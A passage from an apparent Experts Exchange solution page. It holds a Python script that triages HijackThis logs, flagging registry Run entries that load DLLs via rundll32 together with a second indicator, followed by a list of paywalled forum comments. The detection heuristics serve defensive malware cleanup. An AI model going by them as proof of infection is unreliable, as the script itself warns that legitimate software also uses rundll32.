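    r"^O4 - (?P<hive>HK\w+)(?:\\[^\\]+)?\\\.\.\\(?P<key>Run\w*): "
    r"\[(?P<name>[^\]]*)\] (?P<cmd>.*)$"
)
# HKUS entries carry a trailing "(User '...')" annotation, not part of the command.
USER_SUFFIX_RE = re.compile(r"\s+\(User '[^']*'\)$")
# rundll32 [path\]file.dll,Export  (quotes and a full path to rundll32 are optional)
RUNDLL_RE = re.compile(
    r'^"?(?:[a-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s+'
    r'"?(?P<dll>[^",]+)"?\s*,\s*(?P<export>\S+)',
    re.IGNORECASE,
)
# Heuristic (assumption): short letter prefix followed by a run of hex digits.
GENERATED_NAME_RE = re.compile(r"[A-Za-z]{0,4}[0-9a-fA-F]{6,}")


@dataclass
class RunEntry:
    hive: str
    key: str
    name: str
    command: str
    dll: str = ""
    reasons: list = field(default_factory=list)


def parse_run_entries(log_text):
    """Return every registry Run-style O4 entry; other O4 forms are skipped."""
    entries = []
    for line in log_text.splitlines():
        m = RUN_RE.match(line.strip())
        if not m:
            continue
        cmd = USER_SUFFIX_RE.sub("", m["cmd"])
        entries.append(RunEntry(m["hive"], m["key"], m["name"], cmd))
    return entries


def assess(entry):
    """Attach the reasons an entry deserves a closer look."""
    m = RUNDLL_RE.match(entry.command)
    if not m:
        return entry
    entry.dll = m["dll"].strip()
    entry.reasons.append(
        "autostart loads a DLL through rundll32 (export %r)" % m["export"]
    )
    if GENERATED_NAME_RE.fullmatch(entry.name) and any(
        c.isdigit() for c in entry.name
    ):
        entry.reasons.append("value name looks machine-generated")
    if ntpath.dirname(entry.dll).lower().endswith("\\system32"):
        entry.reasons.append("DLL sits directly in system32; verify vendor and signature")
    return entry


def triage(log_text):
    """Flag entries with rundll32 plus at least one further indicator."""
    assessed = (assess(e) for e in parse_run_entries(log_text))
    return [e for e in assessed if len(e.reasons) >= 2]


if __name__ == "__main__":
    for hit in triage(SAMPLE_LOG):
        print("%s\\..\\%s [%s] -> %s" % (hit.hive, hit.key, hit.name, hit.dll))
        for reason in hit.reasons:
            print("   - " + reason)
```

rundll32 in a Run key is not malicious on its own, since legitimate vendor software uses it too; the script therefore only flags an entry when a second indicator is present, and a flagged DLL still needs manual verification before removal.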
About this solution

Zones: HijackThis Software, Windows XP Operating System, Anti-Spyware
Solution Provided By: IndiGenus
Participating Experts: 5
Solution Grade: A
 
 
[+][-]01/27/08 03:27 PM, ID: 20755752

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/27/08 03:33 PM, ID: 20755771

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/27/08 03:42 PM, ID: 20755800

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/28/08 02:34 AM, ID: 20757990

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 30-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]01/28/08 02:39 AM, ID: 20758015

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/28/08 03:36 AM, ID: 20758219

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/28/08 03:36 AM, ID: 20758221

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 30-day free trial to view this Author Comment or ask the Experts your question.

 
[+][-]01/28/08 03:38 AM, ID: 20758226

At Experts Exchange, members can ask their questions to thousands of technology professionals, also known as Experts. Experts compete and collaborate to answer those questions by leaving comments like this one.

Start your 30-day free trial to view this Expert Comment or ask the Experts your question.

 
[+][-]01/28/08 04:33 AM, ID: 20758403

Often, when Experts are collaborating with members who have asked questions, they will request additional information about the problem. Askers respond with an author comment like this one.

Start your 30-day free trial to view this Author Comment or ask the Experts your question.

 
01/28/08 05:24 AM, ID: 20758629 (Author Comment)

 
01/28/08 05:39 AM, ID: 20758726 (Author Comment)

 
01/28/08 07:49 AM, ID: 20760040 (Expert Comment)

 
01/28/08 08:29 AM, ID: 20760504 (Expert Comment)

 
01/28/08 12:23 PM, ID: 20762498 (Author Comment)

 
01/28/08 12:24 PM, ID: 20762506 (Author Comment)

 
01/28/08 01:02 PM, ID: 20762861 (Expert Comment)

 
01/28/08 02:33 PM, ID: 20763608 (Author Comment)

 
01/28/08 02:49 PM, ID: 20763757 (Author Comment)

 
01/28/08 03:08 PM, ID: 20763908 (Expert Comment)

 
01/28/08 03:18 PM, ID: 20763975 (Author Comment)

 
01/28/08 04:13 PM, ID: 20764274 (Expert Comment)

 
01/28/08 04:53 PM, ID: 20764512 (Expert Comment)

 
01/28/08 06:04 PM, ID: 20764894 (Expert Comment)

 
01/28/08 06:16 PM, ID: 20764944 (Expert Comment)

 
01/29/08 03:28 AM, ID: 20766859 (Author Comment)

 
01/29/08 06:37 AM, ID: 20768046 (Expert Comment)

 
01/29/08 07:47 AM, ID: 20768802 (Author Comment)

 
01/29/08 10:44 AM, ID: 20770747 (Expert Comment)

 
01/30/08 01:25 AM, ID: 20775728 (Author Comment)

 
01/30/08 01:38 AM, ID: 20775782 (Author Comment)

 
01/30/08 05:34 AM, ID: 20776819 (Expert Comment)

 
01/30/08 10:57 AM, ID: 20779891 (Author Comment)

 
01/30/08 11:12 AM, ID: 20780068 (Expert Comment)

 
 